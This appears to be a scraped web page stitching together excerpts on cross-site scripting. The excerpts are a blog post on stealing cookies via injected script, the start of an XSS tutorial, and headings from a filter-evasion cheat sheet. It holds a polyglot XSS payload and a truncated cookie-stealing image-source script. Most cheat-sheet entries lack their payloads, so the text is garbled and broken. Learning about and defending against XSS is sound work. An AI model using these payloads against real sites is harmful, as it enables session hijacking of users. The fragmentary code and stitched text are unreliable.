
XSS


XSS - Stealing Cookies 101. Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client. A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October, it reminded us that we must be vigilant in filtering text which users post, because a hacker could smuggle in some JavaScript code to maliciously use the site from the browsers of authenticated users. By stealing a user's cookies, as the LiveJournal hack did, you don't even have to carry out the attack in the user's browser; you can do it elsewhere.

Easy to do? <script> new Image().src=" </script> That was it. We can also use another method in IE. Any time you let users post text and you don't religiously restrict the content, they can steal sessions. So, you might want to start believing every session is stolen. If you are not familiar with the MySpace XSS hack, read up.

Paper: Kr3w's Cross-Site Scripting Tutorial. Part I. What is XSS (Cross-Site Scripting)? XSS, short for Cross-Site Scripting, is the process of injecting JavaScript (mainly) and also HTML into a webpage to obtain important feedback. This feedback may contain many things, one of the most common being the user's cookie. Now, for everybody reading this, I assume that you know what a cookie is and how it is used on a webpage, but if not, I will explain it anyway.

A cookie is the variable that web browsers use to store your login credentials. Part II. XSS is, in my opinion, the most common and dangerous exploit that exists on the internet today.

Steve.org.uk - Computer Security - XSS.

XSS (Cross Site Scripting) Cheat Sheet. Last revision (mm/dd/yy): 07/4/2018. This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters.

XSS (Cross Site Scripting) Cheat Sheet

Please note that input filtering is an incomplete defense for XSS, which these tests can be used to illustrate.

Basic XSS Test Without Filter Evasion. This is a normal XSS JavaScript injection, and most likely to get caught, but I suggest trying it first (the quotes are not required in any modern browser, so they are omitted here):

XSS Locator (Polyglot). The following is a "polyglot test XSS payload."

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Image XSS using the JavaScript directive. (IE7.0 doesn't support the JavaScript directive in the context of an image, but it does in other contexts; the following shows the principles that would work in other tags as well.)

No quotes and no semicolon

Case insensitive XSS attack vector

HTML entities

Malformed A tags
